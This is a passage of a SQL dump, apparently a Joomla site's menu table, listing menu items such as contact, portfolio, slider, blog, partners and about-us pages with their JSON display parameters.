1\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_icon\":\"\",\"mega_class\":\"\",\"mega_cols\":\"1\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_group\":\"0\",\"mega_subcontent\":\"0\"}',230,231,0,'*',0),(575,'mainmenu','Contact Us Page 2','contact-us-page-2','','contact-page/contact-us-page-2','index.php?option=com_contact&view=contact&id=10','component',-2,619,2,8,0,'0000-00-00 00:00:00',0,1,'',0,'{\"presentation_style\":\"sliders\",\"show_contact_category\":\"\",\"show_contact_list\":\"\",\"show_name\":\"\",\"show_position\":\"\",\"show_email\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"\",\"show_postcode\":\"\",\"show_country\":\"\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_misc\":\"\",\"show_image\":\"\",\"allow_vcard\":\"\",\"show_articles\":\"\",\"show_links\":\"\",\"linka_name\":\"\",\"linkb_name\":\"\",\"linkc_name\":\"\",\"linkd_name\":\"\",\"linke_name\":\"\",\"show_email_form\":\"\",\"show_email_copy\":\"\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"\",\"custom_reply\":\"\",\"redirect\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"Contact Us Page 2\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_icon\":\"\",\"mega_class\":\"\",\"mega_cols\":\"1\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_group\":\"0\",\"mega_subcontent\":\"0\"}',232,233,0,'*',0),(576,'mainmenu','FAQ Page','faq-page','','pages/faq-page','index.php?option=com_content&view=article&id=93','component',-2,565,2,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"FAQ Page\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_icon\":\"\",\"mega_class\":\"\",\"mega_cols\":\"1\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_group\":\"0\",\"mega_subcontent\":\"0\"}',68,69,0,'*',0),(577,'mainmenu','Portfolio Page 1','portfolio-page-1','','pages/portfolio-page/portfolio-page-1','index.php?option=com_content&view=article&id=94','component',-2,618,3,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"Portfolio Page 1\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_icon\":\"\",\"mega_class\":\"\",\"mega_cols\":\"1\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_group\":\"0\",\"mega_subcontent\":\"0\"}',89,90,0,'*',0),(578,'mainmenu','Portfolio Page 2','portfolio-page-2','','pages/portfolio-page/portfolio-page-2','index.php?option=com_content&view=article&id=103','component',-2,618,3,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"Portfolio Page 2\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_icon\":\"\",\"mega_class\":\"\",\"mega_cols\":\"1\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_group\":\"0\",\"mega_subcontent\":\"0\"}',91,92,0,'*',0),(579,'mainmenu','Sliders','2013-12-19-05-49-40','','pages/2013-12-19-05-49-40','','url',-2,565,2,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_icon\":\"\",\"mega_class\":\"\",\"mega_cols\":\"1\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_group\":\"1\",\"mega_subcontent\":\"0\"}',70,75,0,'*',0),(580,'mainmenu','Xpert Slider','xpert-slider','','pages/2013-12-19-05-49-40/xpert-slider','index.php?option=com_content&view=article&id=105','component',-2,579,3,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_icon\":\"\",\"mega_class\":\"\",\"mega_cols\":\"1\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_group\":\"0\",\"mega_subcontent\":\"0\"}',71,72,0,'*',0),(581,'mainmenu','Parallax Slider','parallax-slider','','pages/2013-12-19-05-49-40/parallax-slider','index.php?option=com_content&view=article&id=104','component',-2,579,3,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_icon\":\"\",\"mega_class\":\"\",\"mega_cols\":\"1\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_group\":\"0\",\"mega_subcontent\":\"0\"}',73,74,0,'*',0),(582,'mainmenu','Testimonial Page','testimonial','','pages/testimonial','index.php?option=com_content&view=article&id=109','component',-2,565,2,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"Testimonial Page\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_icon\":\"\",\"mega_class\":\"\",\"mega_cols\":\"1\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_group\":\"0\",\"mega_subcontent\":\"0\"}',76,77,0,'*',0),(583,'mainmenu','Coming Soon Page','coming-soon-page','','pages/coming-soon-page','index.php?option=com_content&view=article&id=110','component',-2,565,2,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_icon\":\"\",\"mega_class\":\"\",\"mega_cols\":\"1\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_group\":\"0\",\"mega_subcontent\":\"0\"}',78,79,0,'*',0),(616,'mainmenu','About Us Page','about-us-page','','pages/about-us-page','index.php?option=com_content&view=article&id=84','component',-2,565,2,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_icon\":\"\",\"mega_class\":\"\",\"mega_cols\":\"1\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_group\":\"0\",\"mega_subcontent\":\"0\"}',80,87,0,'*',0),(617,'mainmenu','About Us Page 2 (2)','about-us-page-3','','pages/about-us-page/about-us-page-3','index.php?option=com_content&view=article&id=84','component',-2,616,3,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_icon\":\"\",\"mega_class\":\"\",\"mega_cols\":\"1\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_group\":\"0\",\"mega_subcontent\":\"0\"}',85,86,0,'*',0),(618,'mainmenu','Portfolio Page','portfolio-page','','pages/portfolio-page','index.php?option=com_content&view=article&id=94','component',-2,565,2,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_icon\":\"\",\"mega_class\":\"\",\"mega_cols\":\"1\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_group\":\"0\",\"mega_subcontent\":\"0\"}',88,93,0,'*',0),(619,'mainmenu','Contacts','contact-page','','contact-page','index.php?option=com_contact&view=contact&id=9','component',1,1,1,8,0,'0000-00-00 00:00:00',0,1,'',0,'{\"presentation_style\":\"\",\"show_contact_category\":\"\",\"show_contact_list\":\"\",\"show_tags\":\"\",\"show_name\":\"\",\"show_position\":\"\",\"show_email\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"\",\"show_postcode\":\"\",\"show_country\":\"\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_misc\":\"\",\"show_image\":\"\",\"allow_vcard\":\"\",\"show_articles\":\"\",\"show_links\":\"\",\"linka_name\":\"\",\"linkb_name\":\"\",\"linkc_name\":\"\",\"linkd_name\":\"\",\"linke_name\":\"\",\"show_email_form\":\"\",\"show_email_copy\":\"\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"\",\"custom_reply\":\"\",\"redirect\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_icon\":\"\",\"mega_class\":\"\",\"mega_cols\":\"1\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_group\":\"0\",\"mega_subcontent\":\"0\"}',229,234,0,'*',0),(636,'mainmenu','EasyBlog','easyblog','','3rd-party/easyblog','index.php?option=com_easyblog&view=latest','component',-2,670,2,10134,0,'0000-00-00 00:00:00',0,1,'',0,'{\"limit\":\"-2\",\"includesubcategories\":\"0\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_icon\":\"\",\"mega_class\":\"\",\"mega_cols\":\"1\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_group\":\"0\",\"mega_subcontent\":\"0\"}',222,223,0,'*',0),(653,'mainmenu','EasyDiscuss','easydiscuss','','3rd-party/easydiscuss','index.php?option=com_easydiscuss&view=index','component',-2,670,2,10136,0,'0000-00-00 00:00:00',0,1,'',0,'{\"filter\":\"allposts\",\"sort\":\"latest\",\"limit\":\"-2\",\"user_id\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_icon\":\"\",\"mega_class\":\"\",\"mega_cols\":\"1\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_group\":\"0\",\"mega_subcontent\":\"0\"}',224,225,0,'*',0),(670,'mainmenu','3rd Party','3rd-party','','3rd-party','','separator',-2,1,1,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu_image\":\"\",\"menu_text\":1,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_icon\":\"\",\"mega_class\":\"\",\"mega_cols\":\"1\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_group\":\"0\",\"mega_subcontent\":\"0\"}',221,226,0,'*',0),(671,'main','com_tags','Tags','','Tags','index.php?option=com_tags','component',0,1,1,29,0,'0000-00-00 00:00:00',0,1,'class:tags',0,'',103,104,0,'',1),(672,'main','com_postinstall','Post-installation messages','','Post-installation messages','index.php?option=com_postinstall','component',0,1,1,32,0,'0000-00-00 00:00:00',0,1,'class:postinstall',0,'',101,102,0,'*',1),(673,'mainmenu','Contacts','contacts','','contacts','index.php?option=com_contact&view=contact&id=9','component',-2,1,1,8,0,'0000-00-00 00:00:00',0,1,'',0,'{\"presentation_style\":\"\",\"show_contact_category\":\"\",\"show_contact_list\":\"\",\"show_tags\":\"\",\"show_name\":\"\",\"show_position\":\"\",\"show_email\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"\",\"show_postcode\":\"\",\"show_country\":\"\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_misc\":\"\",\"show_image\":\"\",\"allow_vcard\":\"\",\"show_articles\":\"\",\"show_links\":\"\",\"linka_name\":\"\",\"linkb_name\":\"\",\"linkc_name\":\"\",\"linkd_name\":\"\",\"linke_name\":\"\",\"show_email_form\":\"\",\"show_email_copy\":\"\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"\",\"custom_reply\":\"\",\"redirect\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_icon\":\"\",\"mega_class\":\"\",\"mega_cols\":\"1\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_group\":\"0\",\"mega_subcontent\":\"0\"}',227,228,0,'*',0),(674,'mainmenu','Support','2015-03-12-10-00-21','','2015-03-12-10-00-21','http://www.fitoman.com/fitss/default.aspx','url',1,1,1,0,0,'0000-00-00 00:00:00',2,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_icon\":\"\",\"mega_class\":\"\",\"mega_cols\":\"1\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_group\":\"0\",\"mega_subcontent\":\"0\"}',235,236,0,'*',0),(675,'mainmenu','Partners','partners','','partners','index.php?option=com_content&view=article&id=113','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"0\",\"link_titles\":\"0\",\"show_intro\":\"0\",\"info_block_position\":\"\",\"show_category\":\"0\",\"link_category\":\"0\",\"show_parent_category\":\"0\",\"link_parent_category\":\"0\",\"show_author\":\"0\",\"link_author\":\"0\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"0\",\"show_item_navigation\":\"0\",\"show_vote\":\"0\",\"show_tags\":\"0\",\"show_icons\":\"0\",\"show_print_icon\":\"0\",\"show_email_icon\":\"0\",\"show_hits\":\"0\",\"show_noauth\":\"0\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_icon\":\"\",\"mega_class\":\"\",\"mega_cols\":\"1\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_group\":\"0\",\"mega_subcontent\":\"0\"}',143,144,0,'*',0),(676,'mainmenu','Clients','clients','','clients','index.php?option=com_content&view=article&id=114','component',-2,1,1,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"0\",\"link_titles\":\"0\",\"show_intro\":\"0\",\"info_block_position\":\"1\",\"show_category\":\"0\",\"link_category\":\"0\",\"show_parent_category\":\"0\",\"link_parent_category\":\"0\",\"show_author\":\"0\",\"link_author\":\"0\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"0\",\"show_item_navigation\":\"0\",\"show_vote\":\"0\",\"show_tags\":\"0\",\"show_icons\":\"0\",\"show_print_icon\":\"0\",\"show_email_icon\":\"0\",\"show_hits\":\"0\",\"show_noauth\":\"0\",\"urls_position\":\"1\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":0,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"0\",\"mega_desc\":\"\",\"mega_icon\":\"\",\"mega_class\":\"\",\"mega_cols\":\"1\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_group\":\"0\",\"mega_subcontent\":\"0\"}',137,138,0,'*',0),(677,'mainmenu','Solutions','services','','services','index.php?option=com_content&view=article&id=115','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"0\",\"show_intro\":\"0\",\"info_block_position\":\"\",\"show_category\":\"0\",\"link_category\":\"0\",\"show_parent_category\":\"0\",\"link_parent_category\":\"0\",\"show_author\":\"0\",\"link_author\":\"0\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"0\",\"show_item_navigation\":\"0\",\"show_vote\":\"0\",\"show_tags\":\"0\",\"show_icons\":\"0\",\"show_print_icon\":\"0\",\"show_email_icon\":\"0\",\"show_hits\":\"0\",\"show_noauth\":\"0\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_icon\":\"\",\"mega_class\":\"\",\"mega_cols\":\"1\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_group\":\"0\",\"mega_subcontent\":\"0\"}',113,134,0,'*',0),(678,'mainmenu','About Us','about-us','','about-us','index.php?option=com_content&view=article&id=84','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"0\",\"show_intro\":\"0\",\"info_block_position\":\"\",\"show_category\":\"0\",\"link_category\":\"0\",\"show_parent_category\":\"0\",\"link_parent_category\":\"0\",\"show_author\":\"0\",\"link_author\":\"0\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"0\",\"show_item_navigation\":\"0\",\"show_vote\":\"0\",\"show_tags\":\"0\",\"show_icons\":\"0\",\"show_print_icon\":\"0\",\"show_email_icon\":\"0\",\"show_hits\":\"0\",\"show_noauth\":\"0\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_icon\":\"\",\"mega_class\":\"\",\"mega_cols\":\"1\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_group\":\"0\",\"mega_subcontent\":\"0\"}',107,112,0,'*',0),(679,'mainmenu','Why FIT?','why-fit','','about-us/why-fit','index.php?option=com_content&view=article&id=117','component',1,678,2,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"0\",\"show_intro\":\"0\",\"info_block_position\":\"\",\"show_category\":\"0\",\"link_category\":\"0\",\"show_parent_category\":\"0\",\"link_parent_category\":\"0\",\"show_author\":\"0\",\"link_author\":\"0\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"0\",\"show_item_navigation\":\"0\",\"show_vote\":\"0\",\"show_tags\":\"0\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"0\",\"show_hits\":\"0\",\"show_noauth\":\"0\",\"urls_position\":\"1\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_icon\":\"\",\"mega_class\":\"\",\"mega_cols\":\"1\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_group\":\"0\",\"mega_subcontent\":\"0\"}',108,109,0,'*',0),(680,'mainmenu','Clients (2)','clients-2','','clients-2','index.php?option=com_content&view=article&id=114','component',-2,1,1,22,0,'0000-00-00 